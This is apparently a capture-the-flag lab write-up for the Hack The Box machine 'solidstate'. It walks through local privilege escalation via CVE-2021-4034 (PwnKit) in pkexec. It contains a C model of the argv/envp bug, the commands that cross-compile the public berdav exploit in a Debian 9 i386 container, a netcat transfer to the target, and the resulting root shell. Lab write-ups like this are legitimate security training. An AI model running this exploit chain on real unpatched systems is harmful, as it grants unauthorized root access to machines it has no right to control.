CVE-2021-4034


LinPEAS flagged the target system as vulnerable to CVE-2021-4034. The vulnerable program is pkexec, part of Polkit, which manages process privileges. pkexec lets a non-privileged process run a command as another user (normally root) after an authorization check, much like sudo, with Polkit mediating between the unprivileged caller and the privileged side.

The flaw is an out-of-bounds read and write in pkexec's argument handling when it is started with an empty argument list (argc == 0). The kernel places envp directly after argv's NULL terminator, so pkexec's parser, which begins at argv[1], reads the first environment variable as the program to run and then writes a resolved path back over it. By controlling the environment handed to the SUID-root pkexec, a local attacker can reintroduce a variable such as GCONV_PATH that the dynamic loader strips from SUID programs, and make pkexec load and execute arbitrary code with superuser privileges. It is a local privilege escalation: it needs an existing foothold, here the mindy shell.
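To make the argv/envp overlap concrete, here is an added example (my own model, not pkexec's code and not part of the original write-up). It lays out argv and envp the way execve() does, runs the two statements of pkexec's parser that matter (read argv[n] with n starting at 1, then write the PATH-resolved name back to argv[n]), and shows the patched check that refuses argc == 0. The strings pwnkit.so:. and GCONV_PATH=. are taken from the directory and file names the exploit's Makefile creates later on this page; the function names and the rest of the environment are constructed for the demonstration.

```c
#include <stdio.h>
#include <string.h>

#define SLOTS 16

/* envp[0] after the write-back, kept for inspection by main()/tests. */
static char injected[64];

/* Lay out argv and envp the way execve() does: argv, NULL, envp, NULL.
 * Returns argv; *envp_out is the envp pointer inside the same block, so
 * argv[argc] is the terminator and argv[argc + 1] is envp[0]. */
static char **layout(char **block, int argc, char *const *argv,
                     char *const *envp, char ***envp_out)
{
    int i = 0, j;
    for (j = 0; j < argc; j++)
        block[i++] = argv[j];
    block[i++] = NULL;              /* argv[argc] */
    *envp_out = block + i;          /* envp[0] == argv[argc + 1] */
    for (j = 0; envp[j] != NULL; j++)
        block[i++] = envp[j];
    block[i] = NULL;
    return block;
}

/* Unpatched parser, reduced to what matters: options are skipped starting
 * at n = 1, then argv[n] is taken as the program to run.  With argc == 0
 * the loop never runs and argv[1] is read, which is envp[0]. */
static char *unpatched_program(int argc, char **argv, int *index_out)
{
    int n = 1;
    while (n < argc && argv[n][0] == '-')
        n++;
    *index_out = n;
    return argv[n];
}

/* Second half of the bug: a relative name is resolved through PATH and the
 * result is stored back into argv[n].  With argc == 0 that store lands on
 * envp[0], so whoever controls envp[0] and PATH picks the variable the
 * process ends up with (a modelled resolution, not g_find_program_in_path). */
static void unpatched_write_back(char **argv, int n, const char *path_dir,
                                 char *buf, size_t buflen)
{
    if (argv[n] != NULL && argv[n][0] != '/') {
        snprintf(buf, buflen, "%s/%s", path_dir, argv[n]);
        argv[n] = buf;
    }
}

/* The fix: bail out before touching argv[1] when there is no argv[0]. */
static char *patched_program(int argc, char **argv, int *index_out)
{
    if (argc < 1)
        return NULL;                /* upstream exits here */
    return unpatched_program(argc, argv, index_out);
}

/* Constructed scenario: envp[0] is "pwnkit.so:." and PATH names a directory
 * literally called "GCONV_PATH=.".  Returns 0 when the model reproduces the
 * bug; 1/2/3 identify which step did not behave as expected. */
int run_model(void)
{
    char *block[SLOTS];
    char *no_args[] = { NULL };
    char *env[] = { "pwnkit.so:.", "PATH=GCONV_PATH=.", "SHELL=/bin/sh", NULL };
    char **argv, **envp;
    char buf[64];
    int n;

    argv = layout(block, 0, no_args, env, &envp);

    /* 1. the read: argv[1] is envp[0] */
    if (unpatched_program(0, argv, &n) != envp[0] || n != 1)
        return 1;

    /* 2. the write: envp[0] becomes "GCONV_PATH=./pwnkit.so:." */
    unpatched_write_back(argv, n, "GCONV_PATH=.", buf, sizeof buf);
    if (strncmp(envp[0], "GCONV_PATH=", 11) != 0)
        return 2;
    snprintf(injected, sizeof injected, "%s", envp[0]);

    /* 3. the fix rejects argc == 0 before reading argv[1] */
    if (patched_program(0, argv, &n) != NULL)
        return 3;
    return 0;
}

const char *injected_env(void)
{
    return injected;
}

int main(void)
{
    int rc = run_model();
    printf("model result %d, envp[0] after write-back: %s\n", rc, injected_env());
    return rc;
}
```

Every access in the model stays inside one array, so the program itself has no undefined behaviour; it only shows why, in the real process, pkexec's in-bounds-looking argv[1] is the first environment string, and why a directory named GCONV_PATH=. turns a harmless program name into a GCONV_PATH variable.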

Exploit (PwnKit)


I found a public exploit online: the berdav/CVE-2021-4034 repository, which packages the PwnKit technique as a small C launcher plus a shared object.

${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ gcc
bash: gcc: command not found

The target system has no compiler, so the exploit has to be built elsewhere, on a system matching the target's architecture and C library, and then transferred over.

Docker Exploit Development


The target system is Debian 9 on the i686 architecture, i.e. 32-bit x86.

I was unable to find an i686 Debian 9 image on Docker Hub, but there is an i386 one. Debian's i386 port is its 32-bit x86 port, so binaries built on it run on an i686 target.

There should be no problem compiling there.

┌──(kali㉿kali)-[~/archive/htb/labs/solidstate]
└─$ docker run -it --entrypoint "/bin/bash" --name deb9_i386 i386/debian:9
Unable to find image 'i386/debian:9' locally
9: Pulling from i386/debian
198ad075a14b: Pull complete 
Digest: sha256:5be6b5853a13d413e4ef557ed1cbf6cf0ba4896769c7c37422fada653e0cdee5
Status: Downloaded newer image for i386/debian:9

Creating a Docker container from the i386 Debian 9 image, with bash as the entrypoint

root@b860970089e6:/# dpkg --print-architecture
i386
 
root@b860970089e6:~# ldd --version
ldd (Debian GLIBC 2.24-11+deb9u4) 2.24
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

Once inside, I confirm the architecture and the glibc version, which should match the target's. The exploit's payload is a shared object that pkexec loads into its own process, so it has to be built for the same architecture, and linking against a newer glibc than the target's could leave the binaries referencing symbol versions the target cannot satisfy.

root@b860970089e6:/# apt update -y ; apt install -y net-tools netcat nano gcc gcc-multilib make git

Then update the package index and install the build tools the exploit needs (gcc, gcc-multilib, make, git) plus netcat for the transfer.

root@b860970089e6:~# git clone https://github.com/berdav/CVE-2021-4034 ; cd CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56
Unpacking objects: 100% (92/92), done.

Clone the exploit repository.

root@b860970089e6:~/CVE-2021-4034# make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.

Compile. The Makefile builds pwnkit.so, the shared object pkexec will be tricked into loading, and cve-2021-4034, the launcher that starts pkexec with no arguments and a crafted environment. It also writes a gconv-modules file mapping a made-up charset PWNKIT to the pwnkit module, and creates a directory literally named GCONV_PATH=. holding an executable named pwnkit.so:. (a copy of /bin/true). The names are chosen so that when pkexec looks up pwnkit.so:. through PATH and writes the resolved path GCONV_PATH=./pwnkit.so:. back over envp[0], the process gains a GCONV_PATH variable pointing at the current directory, and the first character-set conversion to PWNKIT loads pwnkit.so as root.

root@b860970089e6:~/CVE-2021-4034# cd ../ ; tar -czvf CVE-2021-4034.tar.gz CVE-2021-4034

Archive the directory that contains the compiled exploit for transport

root@b860970089e6:~# nc 10.10.10.51 2222 < CVE-2021-4034.tar.gz

Ship the archive to the target over a raw TCP connection. The listener on the target (next step) has to be running before this command is issued, or the connection is refused. Netcat gives no integrity guarantee, so compare a checksum of the archive (sha256sum) on both sides before unpacking it.

${debian_chroot:+($debian_chroot)}mindy@solidstate:/dev/shm$ nc -nlvp 2222 > CVE-2021-4034.tar.gz
listening on [any] 2222 ...
connect to [10.10.10.51] from (UNKNOWN) [10.10.14.5] 43456

Receive the archive with a Netcat listener on the target, writing to /dev/shm, a world-writable tmpfs that leaves nothing on disk.

Exploitation


${debian_chroot:+($debian_chroot)}mindy@solidstate:/dev/shm$ tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034

Extract the archive and change into the directory.

${debian_chroot:+($debian_chroot)}mindy@solidstate:/dev/shm/CVE-2021-4034$ ./cve-2021-4034
# whoami
whoami
root
# hostname
hostname
solidstate
# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:3e:11 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.51/24 brd 10.10.10.255 scope global ens192
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:3e11/64 scope global mngtmpaddr dynamic 
       valid_lft 86395sec preferred_lft 14395sec
    inet6 fe80::250:56ff:feb9:3e11/64 scope link 
       valid_lft forever preferred_lft forever
 

Execute the exploit. pkexec is SUID root, so the code in pwnkit.so runs with root privileges and spawns a shell; whoami, hostname and ip a confirm a root shell on solidstate (10.10.10.51). The shell is not interactive, which is why each command is echoed back before its output.

System Level Compromise